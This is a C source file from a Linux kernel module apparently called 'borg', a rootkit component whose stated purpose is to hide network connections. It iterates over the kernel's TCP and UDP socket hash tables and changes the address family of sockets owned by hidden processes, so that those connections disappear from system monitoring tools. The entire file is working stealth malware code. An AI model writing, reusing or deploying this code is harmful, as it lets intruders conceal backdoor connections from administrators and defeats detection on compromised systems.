/**
 * @file net.c
 * @brief Hide network connections.
 */

#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/net.h>
#include <net/inet_hashtables.h>
#include <net/tcp.h>
#include <net/udp.h>
#include <net/sock.h>
#include "borg.h"
#include "net.h"
#include "process.h"

void net_hide_socket(struct sock *sk, int hide)
{
    if(process_hidden_has_inode(sk->sk_socket->file->f_dentry->d_inode->i_ino))
    {
	if(sk->sk_family == AF_INET || sk->sk_family == BORG_HIDDEN_INET)
	{
	    _DEBUG(("%s: net_hide_tcp_socket(%d): (un)hiding IPV4 socket [%lu]\n",
		BORG_VERSION, hide, sk->sk_socket->file->f_dentry->d_inode->i_ino));
	    if(hide)
		sk->sk_family = BORG_HIDDEN_INET;
	    else
		sk->sk_family = AF_INET;
	}
	if(sk->sk_family == AF_INET6 || sk->sk_family == BORG_HIDDEN_INET6)
	{
	    _DEBUG(("%s: net_hide_tcp_socket(%d): (un)hiding IPV6 socket [%lu]\n",
		BORG_VERSION, hide, sk->sk_socket->file->f_dentry->d_inode->i_ino));
	    if(hide)
		sk->sk_family = BORG_HIDDEN_INET6;
	    else
		sk->sk_family = AF_INET6;
	}
    }
}

void net_hide_tcp(int hide)
{
    struct sock *sk = NULL;
    struct hlist_node *node = NULL;
    int i;

    _DEBUG(("%s: net_hide_tcp(%d)\n", BORG_VERSION, hide));
    
    /* Loop all open IPV4 listeners, and find their inodes. */
    for(i = 0; i < INET_LHTABLE_SIZE; i++)
    {
	sk_for_each(sk, node, &tcp_hashinfo.listening_hash[i])
	{
	    net_hide_socket(sk, hide);
	}
    }
    /* Loop all open connections, and find their inodes. */
    for(i = 0; i < tcp_hashinfo.ehash_size; i++)
    {
	sk_for_each(sk, node, &tcp_hashinfo.ehash[i].chain)
	{
	    net_hide_socket(sk, hide);
	}
    }
}

void net_hide_udp(int hide)
{
    struct sock *sk = NULL;
    struct hlist_node *node = NULL;
    int i;

    _DEBUG(("%s: net_hide_udp(%d)\n", BORG_VERSION, hide));
    
    for(i = 0; i < UDP_HTABLE_SIZE; i++)
    {
	sk_for_each(sk, node, &udp_hash[i])
	{
	    net_hide_socket(sk, hide);
	}
    }
}

void net_hide(void)
{
    _DEBUG(("%s: net_hide()\n", BORG_VERSION));
    net_hide_tcp(1);
    net_hide_udp(1);
}

void net_unhide(void)
{
    _DEBUG(("%s: net_unhide()\n", BORG_VERSION));
    net_hide_tcp(0);
    net_hide_udp(0);
}
